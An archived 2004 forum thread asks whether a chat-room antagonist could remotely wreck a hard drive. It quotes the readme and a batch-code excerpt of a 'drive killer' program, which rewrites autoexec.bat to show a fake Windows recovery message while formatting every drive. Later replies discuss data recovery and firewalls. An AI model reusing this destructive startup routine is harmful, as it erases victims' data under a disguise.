|
Home > Archive > General Discussion > April 2004 > Any hackers in here?
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
Any hackers in here?
|
|
| KiwiPete 2004-04-22, 3:07 am |
| At the risk of sounding ignorant...
(so what's new?) 
The following is an excerpt from a conversation with a friend of mine in a hub I run:
"i was in a chat room & was talking to some friends & this little crap was Fu$%ing with one of my friends so i told him to stop & he told me to Fu$% off then he say bye bye & nuked me...
he some how got my IP & boom...
then i try to start it back up and its dead as dead can get...
i went to a shop to have them look at it & he told my my harddrive is dead...
the guy tryed to get in to it and he told my DAMN dude your FU$%ed...
when it happend i heard a sound like a buzz then boom it turned off..."
Is it possible to remotely kill a machine like that? | |
| KiwiPete 2004-04-22, 3:39 am |
| Wow.
You beat me to it.
I was just about to post an answered-my-own-question reply.
"The program, once executed, will start eating up the hard drive, and/or infect and reboot the hard drive within a few seconds. After rebooting, all hard drives attached to the system would be formatted (in an unrecoverable manner) within only 1 to 2 seconds, irregardless of the size of the hard drive. The program has reported to have caused physical damage to some hard drives (on many occasions). However, the program was not in any way designed to cause physical damage, only data."
Amazing. | |
|
| I dunno about in an unrecoverable manner Pete. I have helped a couple people hit by variations and have been able to extract a fair quantity of data using decent data recovery software.
Have also completely resurrected a drive once using Active@ Partition Recovery.
Most of the drive killers I have seen work by moving data values up 1 level - one I got hit with myself a few years back turned all the vowells up x 1 a = e e = i i = o etc ... However there are some nasty ones out there that work at the binary level and can really make a mess of things. | |
| KiwiPete 2004-04-22, 6:44 pm |
| I think Enforcer has been Enforcing.
| |
|
|
| DaDnDe 2004-04-23, 9:14 pm |
| exactly or approximately, how did this guy manage to do this to you? | |
| KiwiPete 2004-04-24, 2:30 am |
| quote:
Originally posted by DaDnDe
exactly or approximately, how did this guy manage to do this to you?
Enforcer? Well, he hit the Delete button, and..
It wasn't me, it was a friend of mine. (no, really)
Apparently he was in a chatroom somewhere & some script kiddie started giving him cheek. He gave as good as he got & the next thing he knew, his machine rebooted.
I was more curious about how someone could remotely physically damage a hard drive.
I now know he got into his machine & ran the app remotely.
In the readme file of the app in question, the hacker says:
"- I'd like to acknowledge me for writing one of the most destructive programs on the net (if not the only).
- I'd also like to acknowledge my cat for licking me in the face and waking me up every time I fell asleep in front of the keyboard while writing this program. THANKS CAT!"
"After it is run, it is going to start destroying every existing Hard Drive in the computer, and then it is going to DEFINATLY destroy every existing Hard Drive again when the computer is restarted, sort of like continuing from where it left off. The person only needs to run it for a few seconds, then even if they exit the program without letting it stuff up their hard drive, it will continue from where it left off when it restarts. So there is no escape, the previous versions did not do that due to bugs, but version 4.0 does. Even if the person stops loading the program after 1 second, it isn't a problem, when the computer is restarted, it would kill drive C. However, if it is run for about 3-4 seconds (in which it easily would) then all the HD's would be gone forever."
"I have destroyed myself with version 2.0 of this program. I had to take it to a data recovery specialist, they recovered about 30% of the data for 1,000's of dollars, however 6 days later, I did the same thing again =:-( .
Here is what my Data Recovery Specialist said . . .
"It was tremendously amazing that we were able to even recover the data that we did, it took 30 working hours to partially restore some of the files".
In part, the code reads:
"set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat"
Pretty clever for an Aussie.
I grabbed an old 2G disk from work, installed Windoze95 & then ran this thing.
It does a very good job.
| |
| DaDnDe 2004-04-24, 11:59 am |
| did your friend have any level of protection? or can this happen to anyone? | |
| KiwiPete 2004-04-24, 4:03 pm |
| No, he'd turned his firewall off.
(couldn't be bothered asking why)
Idiot. | |
| DaDnDe 2004-04-24, 4:21 pm |
| he turned off his firewall?
hmmm he didnt by any chance turn off the firewall to enable the chat to work?
i know someone who did that. nothing bad happened to her. but she was happy when i showed her how to just open the ports necessary for chat to work while keeping the rest of her system protected. |
|
|
|
|
